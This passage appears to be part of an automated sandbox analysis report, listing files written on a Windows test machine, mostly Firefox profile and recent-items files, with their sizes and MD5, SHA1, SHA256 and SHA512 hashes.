SHA5129d170df5ecb030406aa495be29f1f1bc60853b750975d4a3b7beb23c2e2932d31851ca57a09c59528954b523fce29f283f34af56fe907bb5f265cb95ca1ef05a
-
Filesize
257B
MD5b55d697eef42a31cf5f20c4c0f1a0542
SHA1bf1e6b60a05ba7653eed79a741fb483089bfcb4b
SHA2568f539fff8dab1089705abc0f5dc264ccd35e3f02b9e75080f7c7ff2ddd03cd4e
SHA51289f14a5530468fb44aaf82cab8582177c7ed22f881b57fe1ce3227cc3635535439f5b08b365e323ba83fab8556f9ce6367a924e457647e056cc703b28ecb22bc
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize3KB
MD57720caa1b668393763536bf585c2609f
SHA1f6737da7746160bd0027b50f297fdaaef043a1ed
SHA2561cdb40f7d9b1a0569e77e6454eda5908e84506db7f10507456a0d86863785bd5
SHA5124d29b3b515211a9adb1a702eebefc73e796e5f78cbf67c45ff08af70ee62114f6dccd401c59becdbfd349763c99163242a8755e54599cbf56dad9f888528f1ab
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms~RFe57ad47.TMP
Filesize3KB
MD513d67f3b6428aed8c97bebed698be6ea
SHA1b18739a6036368eb257f2e407af71db072f7815c
SHA256a3ec3b1b1381c6120218dc7d66282289ce1ca6642da4c4938f04c2c4998a2d77
SHA512c31e8f57f822ac3d62bc2d84c77d2bf0c3ca579ea3758eae58e95fbc80a7932f88c35fbc6da13397baf5e5a80c1c2bc729105a9a45957442f1da719a1c870b23
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\db\data.safe.bin
Filesize2KB
MD50634f6deabc4463982758c4548b8687d
SHA1273533f87ec7152c95dbd3a72b8229cd1c8c4c09
SHA25699549939db5d3568d511851272086f3e8da2149ce61ec86171771414d50d6136
SHA512065f40690ce871c437cb90dea47bc67445aefa687097564a09be28c62e970a4bbf5e5b6c0fb3705479451b8320d7670cefa729e2aac5129d02a4b080c98350ac
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\pending_pings\6bed7078-9ca1-47f3-9f3e-c2a4f880f72e
Filesize746B
MD50ed98d34ff059bf2583ec0aa480f27e7
SHA17bef4772c687b0526eb673f6e3c4dbd3fa39c707
SHA25685a66cc85c6d94528d7184241f29e79dae944d3a970ff1c139a8cc055c572beb
SHA5126d39aee0562199cf673371ec94b620c1fdea3e2b24430a17cd584b43f4158f818602fde4cac4291b7f5f12bae1aba53b76444e099326c86f6a5e2e8836df280f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\datareporting\glean\pending_pings\bba4614c-e42e-4ade-b1c0-89d15b0fc129
Filesize11KB
MD529afee06913602f5320abdf176b077d7
SHA12bbaf3700e8c9fe25a4ceebef9df209ec5f87551
SHA25636059a98e58a41e7739e68a7ff089cc23bd42314af19f100614c3e791cbc169f
SHA512ca9515a69e08022fb429feef758d3f7d15e86226b7f5247f0fecaad073c290d6996f5df7449ac1b78757cd1bb291ae88aa700c98327d9fdb9b05af64859a6122
-
Filesize
6KB
MD55cbcbc61439741c561e2c25eb8d6dc44
SHA13cd488e35e0f57076727ca855730aafbc8e71863
SHA256db09977ab67378b77c7f510469afd79191571b7dc0fd3d98ee09febe1fc529e7
SHA512c5dd253a927f7f43263a9b0786ea1e4d3cafc4d4cf3acf2eb8caa593b0e670b4e29925c1c7dc6f34b3379c6ad7d8d15462d26077fb529c80c9f588d3d39c44c0
-
Filesize
6KB
MD5952787e2f2f30e6cffc5b962e3cf387f
SHA179a89a8780a710acce49a14ed992348e9bb3b8e2
SHA256849560f9324cff936223f1418b98bdacbd231d7419f690c747de50609d49aafa
SHA51264cff1a7aceb5c67bd374ede1716197aadc42bee2a6bd6564e70bd4c023ed8b6fdbde93341031b826f0b9663440dae9ce36640b40bc7e09e926ace78f06c60c9
-
Filesize
6KB
MD5b20b7ae363ff83d36dbd10895ab4ff8e
SHA1a36ff63db7eeed96e2f50871a5b4978ab1224bff
SHA256a340b3dae6dddd0fcb8408db297d298d3bb1989d283c20eeb84f71f2bfd0a1c8
SHA512a0f95862b88c330279314d2d5ed0fc575f05cd08289acb8fb180e6542da750bfd18b1ac5c9e31fe47cdeb35f0b7afa7d5a670b00b52204bc64560cbefd4577a0
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionstore-backups\recovery.jsonlz4
Filesize1KB
MD5f8d05d9d41f0dbb6fc6ba28f214e6b3a
SHA1bb6d6f6af2cab55a2854bfc7b718ef9d4d725389
SHA256df4219d12d163c8e75916ccdb68eb2d3080549cf381092ee5f14c8f884ede4e6
SHA512ceb303d4b29bf3f7664165038fd50913286914a80dcd537077bc6daa5d77628e6ccfeb652950d9166bfde3ff79e0c9bcab3df8ad4404b6fe29c4d07eaa0c39a6
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD5c6517c79a8dab2233a9e8d26823746a7
SHA19cccf6925871041b5bb1710288dd823369b4ab96
SHA256a738563dbdb64c5f96e1bb915540787d0b64fd557da62a9dc6689c634f9b03c2
SHA5124adeb8044b9a73d24f754e9620cd7d1460e8d54b16313741b6b09b3d3160dc993ee88b80fe339802d5e4329f4ae05509a2ad01dabd78d04cb9440543c80ec4ac
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionstore-backups\recovery.jsonlz4
Filesize3KB
MD5aaec95359adfc8311ad7a6e9d3e8c503
SHA149ab2d582a88e6c4835638b532015fd003bc9ac1
SHA256d7b69ce01098175c8013ad975159ff18a5b65f60eaf07f194b39c0aece485139
SHA5125752cc6b1d6ca6e47a9a9aad13e3396da026cc44f4f0e70d1d478abbb61ae1bcb035936e49d202f12e771d9b76a11e0f37de1ba18bf84722458d2feb269e51ab
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\sessionstore.jsonlz4
Filesize4KB
MD51cfc3469a082b089e3ee0cd3e620aec5
SHA1248b9ab9c3af83e01d8e41bee91e09a4cfc2ab4d
SHA256cb4a3eabc514be7c43f69416b591a663986cf43d8163cf96714ec3a1ea8e3109
SHA512614d8628924bc51c62731554807a466b22e47410e58b54fe8f27776043ee2b9f6db213919f88105cc56df85c6b3cf14a10b016e03d8b8d86956e307548b509a2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wjyk7j4u.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize184KB
MD57f868e557b098795d645df9ea302427f
SHA1001f3306144559b4049a8ab139b4139f51e59c0e
SHA256b228e23ecfb7965e3badefcbb031de0b4bb887634bccb34a826ac8ac89124ac5
SHA51256fd8aa514cc25db5a2c9191d665eaffe90182cc5e4f15317e0cfbc9adf7336d9ad937d20384b0504f784e5939b76b4c4b0020cb06e4a472c650355cc6c4c89a
-
Filesize
2.1MB
MD5db7e67835fce6cf9889f0f68ca9c29a9
SHA15565afda37006a66f0e4546105be60bbe7970616
SHA256dbd3057a58fd3407c95418bc5d9c253adc8c658ee338f22d58374ed3ea37b738
SHA512bc2714bb408715e5e1cec1337b831e26dbda208183955a07ec8653a38c9c0f25f60f333a154b738927ce085e7bbff438963b941a6c2773b3e7325cd900e7651b
-
Filesize
1.1MB
MD559c15c71fd599ff745a862d0b8932919
SHA18384f88b4cac4694cf510ca0d3f867fd83cc9e18
SHA256c4ed07ad748661ce776ac6ebb4f8bef7619586bfb4443ce58c92d4b889f3d5c2
SHA512be3425d55dcaa361bc8481b87b2086454baca79a3c948de9acf9ef7d3084d6d987c328d665b45dfcd0510e2c97c980aa63d7cd669fe9fc1a67983c325593481e
-
Filesize
1.4MB
MD56fdb2e9ca6b7a5ad510e2b29831e3bc8
SHA14a14ee9d5660eb271a6b5f18a55ac3e05f952c68
SHA256f510c85b98fa6fe8d30133114a34b7f77884aa58e57a0561722eeb157dc98a38
SHA512d5248dd902d862afa060ab829fc3a39dccc26dab37737e14a3f9b90b1d3f900b3bf5821f450502a2124016acf0e84bd8979758827a92741f879b2fa4addfda06
-
Filesize
31KB
MD55dc69a3e2fda6cb740f363ef77edcc13
SHA1c177fabf17346531e07d562be11915bf2822148a
SHA2567c24abda04537749bfb1b2d2aa57a7c9261f41012435269347f7eb2d05f71621
SHA512b32848b6eded965245b759be1b72b6fc81acb4002eceae96004e88e549e21eb6eb1ceb3e51f6249d7dfb739f31223e623f7c525f677939bc935d2f6bffb50a9f
-
Filesize
1.0MB
MD5471076308d78944d45ab35d37134134a
SHA105cf2cf6e5d11ce10425b14d68cda3246cc47263
SHA25638d10ba2f4411eba8351d5b3fed74ca46bf856569dca757d055eb49d8471e11b
SHA5127f140546ceda85d3c178a61689a0743c75623b7d1e2dcc3e2d29128d7e13d9671cdb660ca46312dbd8ff3d63c12836caf1a6a54c074d66bed269184044bdd9c3
-
Filesize
47KB
MD52616f33bfc84fecd6496c0e3bfbfb1b0
SHA1e4f4fba392ba4a245415729a82aaa486ca31b2ba
SHA25624fbc1c09ca302ed51429082130f7789d36c254c0fb165dd96c3f24b458536a4
SHA512b5c585d7bbdce5e5c34447a311ccdb5b90e34cfd29671f2ebb05f01941e81ae7bcffbd42f5ed476e784684de70cb0fb67cedfd7e62c4c3b5cbe151fc6923dafb
-
Filesize
3.1MB
MD50ec949707e99906b84441162d6cf8663
SHA1d5c950207379849dbbc9d9ec00a13f60c192e232
SHA25626286ef37a9eba53b1f46820899a14ebb3472b47b8f25f4ce800826ad6551445
SHA51212beea010f2dce4f5d1ac0e0833b9f1bc4cac358a56559913600ced4c8bcacbe85f2d2224b81ba8f39b6a1b46fdb8867183a6b925245ef6aa33bf8ae9c205258
-
Filesize
162B
MD5f8651d4074a564ab028ff95e05c8f18b
SHA1927ffb91eb1a16bff1c7e9349c0b0caefaa10c74
SHA256a99406f8b72b81ecb7c6a76d4a8fc2bb3dc1849c899db240a9333279b832b542
SHA51277ede71954fb9b07b8c34195feaa9408a953028298b4976d3351245dc5cdb3d8ed366e2a3d2e719680eda64098d96d070a6d488d856d30597793ce3e50e59fbd